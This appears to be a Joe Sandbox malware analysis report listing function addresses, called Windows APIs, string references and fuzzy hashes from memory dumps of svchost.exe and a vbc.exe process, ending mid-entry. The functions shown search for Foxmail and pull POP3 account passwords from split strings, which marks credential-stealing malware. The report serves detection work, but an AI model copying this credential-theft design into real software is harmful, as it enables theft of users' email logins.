Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3485069817e8d772b0541969b6f3e10543c4432b15c1102ab55b6769e09daa4d
Instruction ID: c321e6b3e9044a33af8974e6ffe92dc0d9ed1f9f6d855d2d3bbcbf176f22d471
Opcode Fuzzy Hash: 3485069817e8d772b0541969b6f3e10543c4432b15c1102ab55b6769e09daa4d
Instruction Fuzzy Hash: 6B01F47570C8064BD71CBD7C96671B9319AD785310721827EE95BC73E6EC18D81202C5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9AD2C Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cf2dc3546bb28d105dd93bbc243cf715e7289dff50a9006b1695dcc789fd062
Instruction ID: 8fd5647f1a0daf94396011f9beaf8f3834a183b0fc1df416accb87df6ddbb558
Opcode Fuzzy Hash: 7cf2dc3546bb28d105dd93bbc243cf715e7289dff50a9006b1695dcc789fd062
Instruction Fuzzy Hash: 54E09AA180F6810FC306AA3589A4410BF64AF9220179944EFC4888B2EAE52E684ACB12

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4B070A04 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1826904128.00007FFB4B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb4b070000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82302de2b9b26a5cd3194be66a82dca7dadb84f8076611ff51f9c29e863e9fff
Instruction ID: 13bf817a4a0c20c308244086ede309b0bab9bb692252f5ab6cf5cdfd8d0c6494
Opcode Fuzzy Hash: 82302de2b9b26a5cd3194be66a82dca7dadb84f8076611ff51f9c29e863e9fff
Instruction Fuzzy Hash: 8DE01230A15628CEDF60EB18CC81BEAB3B5FF98300F0041E6D44EE3241CA306A85CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF9D120 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 343fa0a8336b86a950a0ebd3724f601de28942a9c8cb757c3b7a73f7a56af619
Instruction ID: d52027179e438336ecbcd93d8721d9ca587ae059d9592e0af7354aad083342b7
Opcode Fuzzy Hash: 343fa0a8336b86a950a0ebd3724f601de28942a9c8cb757c3b7a73f7a56af619
Instruction Fuzzy Hash: 06C0123055660D8BC7597B34C5514547165AF49204BD005BCD40DC92D2DE3F9882C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFB4AF96770 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f887ffeff5e2ae087036ebe84fce8eae069254c03c59d77103e6334281badad1
Instruction ID: ed351e6064d25b03f6b77ff42e7e3effae5458612a7facc0ae195f9088b9b30d
Opcode Fuzzy Hash: f887ffeff5e2ae087036ebe84fce8eae069254c03c59d77103e6334281badad1
Instruction Fuzzy Hash: 15D0A7A081E2410BD71A7E3081B80253AA86F41312BA414FFE8488E2DAD62E90494309

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFB4AF986FA Relevance: 5.1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFB4AF98722
L_^, xrefs: 00007FFB4AF986FA
L_^, xrefs: 00007FFB4AF987C9
L_^, xrefs: 00007FFB4AF98762

Memory Dump Source

Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^
API String ID: 0-2357752022
Opcode ID: 5e13fce87837abaf485b3b9acff2dd10d68ea3fbea396d53e1a7d6f6a8f1a00b
Instruction ID: c57e47971eaf1b93a12e87c6f595accc6e88913025d2d2402b634e2c6135982e
Opcode Fuzzy Hash: 5e13fce87837abaf485b3b9acff2dd10d68ea3fbea396d53e1a7d6f6a8f1a00b
Instruction Fuzzy Hash: E221C8F391828947D7066F6EDCE61E937E4EF1121CB5851F1CAA88B243FE34644E458A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vbc.exePID: 4360, Parent PID: 5864COMMON

Execution Graph

Execution Coverage:	3.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.8%
Total number of Nodes:	1592
Total number of Limit Nodes:	9

Executed Functions

Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
lstrcatW.KERNEL32(?,?), ref: 10001151
lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
FindClose.KERNELBASE(00000000), ref: 100011DB

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: lstrlen$Find$File$CloseFirstNextlstrcat
String ID:
API String ID: 1083526818-0
Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

Uniqueness

Uniqueness Score: -1.00%

Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434

Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
Part of subcall function 100010F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
Part of subcall function 100010F1: FindClose.KERNELBASE(00000000), ref: 100011DB

lstrlenW.KERNEL32(?), ref: 100014C5
lstrlenW.KERNEL32(?), ref: 100014E0
lstrlenW.KERNEL32(?,?), ref: 1000150F
lstrcatW.KERNEL32(00000000), ref: 10001521
lstrlenW.KERNEL32(?,?), ref: 10001547
lstrcatW.KERNEL32(00000000), ref: 10001553
lstrlenW.KERNEL32(?,?), ref: 10001579
lstrcatW.KERNEL32(00000000), ref: 10001585
lstrlenW.KERNEL32(?,?), ref: 100015AB
lstrcatW.KERNEL32(00000000), ref: 100015B7

Strings

Foxmail, xrefs: 1000143F, 10001453, 10001467, 1000147B, 1000148F, 100014A3, 100014F7, 10001527, 10001559, 1000158B, 100015BD
), xrefs: 100014C7
ProgramFiles, xrefs: 1000142F

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
String ID: )$Foxmail$ProgramFiles
API String ID: 672098462-2938083778
Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

Uniqueness

Uniqueness Score: -1.00%

Function 1000C7E6 Relevance: 9.1, APIs: 6, Instructions: 65
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860

Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
Part of subcall function 1000C803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
Part of subcall function 1000C803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-0
Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE

Uniqueness

Uniqueness Score: -1.00%

Function 1000C7A7 Relevance: 7.6, APIs: 5, Instructions: 100
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860

Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
Part of subcall function 1000C7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
Part of subcall function 1000C7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-0
Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE

Uniqueness

Uniqueness Score: -1.00%

Function 1000C803 Relevance: 7.6, APIs: 5, Instructions: 54
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: AddressProcProtectVirtual$HandleModule
String ID:
API String ID: 2152742572-0
Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE

Uniqueness

Uniqueness Score: -1.00%

Function 1000731F Relevance: 3.1, APIs: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 1000736B
GetFileType.KERNELBASE(00000000), ref: 1000737D

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 1840a6b79673b13cd3d072b9ddd79dce05a280615f1340ab33f998355891a153
Instruction ID: e86c036d32a0859c32490e3d1b68e1c75febfc356a3e106fe76682d7938830a3
Opcode Fuzzy Hash: 1840a6b79673b13cd3d072b9ddd79dce05a280615f1340ab33f998355891a153
Instruction Fuzzy Hash: 8B11E731D04B5286F330CA3D8C84616AAD5F7421F0B350729DCBED26F9C738DA82B641

Uniqueness

Uniqueness Score: -1.00%

Function 10001EEC Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_crt_process_attach.LIBCMT ref: 10001F22
dllmain_crt_process_detach.LIBCMT ref: 10001F35

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: dllmain_crt_process_attachdllmain_crt_process_detach
String ID:
API String ID: 3750050125-0
Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 100060E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55

Uniqueness

Uniqueness Score: -1.00%

Function 10004AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
ExitProcess.KERNEL32 ref: 10004AEE

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68

Uniqueness

Uniqueness Score: -1.00%

Function 10006580 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 10006713

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 1000724E

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
Instruction ID: 1e6cba0042ebf2c12c09a4b69519b161692f08ba8376aa17aabccb2fe2e68a66
Opcode Fuzzy Hash: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
Instruction Fuzzy Hash: 81A01130A002228FE3208F308A8A30E3AACAA002C0B00803AE80CC0028EB30C0028B00

Uniqueness

Uniqueness Score: -1.00%

Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B

_strlen.LIBCMT ref: 10001855
_strlen.LIBCMT ref: 10001869
_strlen.LIBCMT ref: 1000188B
_strlen.LIBCMT ref: 100018AE
_strlen.LIBCMT ref: 100018C8

Strings

Pass, xrefs: 100017C6
POP3, xrefs: 100017D9
un, xrefs: 10001787
Pass, xrefs: 100017E3
word, xrefs: 100017EA
t, xrefs: 100017BF
Acco, xrefs: 100017A7
word, xrefs: 100017CD
POP3, xrefs: 1000179D
un, xrefs: 100017B6
Acco, xrefs: 1000177A
t, xrefs: 10001790

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: _strlen$File$CopyCreateDelete
String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
API String ID: 3296212668-3023110444
Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96

Uniqueness

Uniqueness Score: -1.00%

Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strlen.LIBCMT ref: 10001A2D
_strlen.LIBCMT ref: 10001A59
_strlen.LIBCMT ref: 10001A77
_strlen.LIBCMT ref: 10001AC0
_strlen.LIBCMT ref: 10001AD3
_strlen.LIBCMT ref: 10001AE0
_strlen.LIBCMT ref: 10001B24
_strlen.LIBCMT ref: 10001B44
_strlen.LIBCMT ref: 10001B67
_strlen.LIBCMT ref: 10001C14
_strlen.LIBCMT ref: 10001C37

Strings

%m$~, xrefs: 10001A1D
~dra, xrefs: 100019FD
Gon~, xrefs: 10001A07
~F@7, xrefs: 10001A16

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: _strlen
String ID: %m$~$Gon~$~F@7$~dra
API String ID: 4218353326-230879103
Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 10007D06

Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF

_free.LIBCMT ref: 10007CFB

Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746

_free.LIBCMT ref: 10007D1D
_free.LIBCMT ref: 10007D32
_free.LIBCMT ref: 10007D3D
_free.LIBCMT ref: 10007D5F
_free.LIBCMT ref: 10007D72
_free.LIBCMT ref: 10007D80
_free.LIBCMT ref: 10007D8B
_free.LIBCMT ref: 10007DC3
_free.LIBCMT ref: 10007DCA
_free.LIBCMT ref: 10007DE7
_free.LIBCMT ref: 10007DFF

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14

Uniqueness

Uniqueness Score: -1.00%

Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

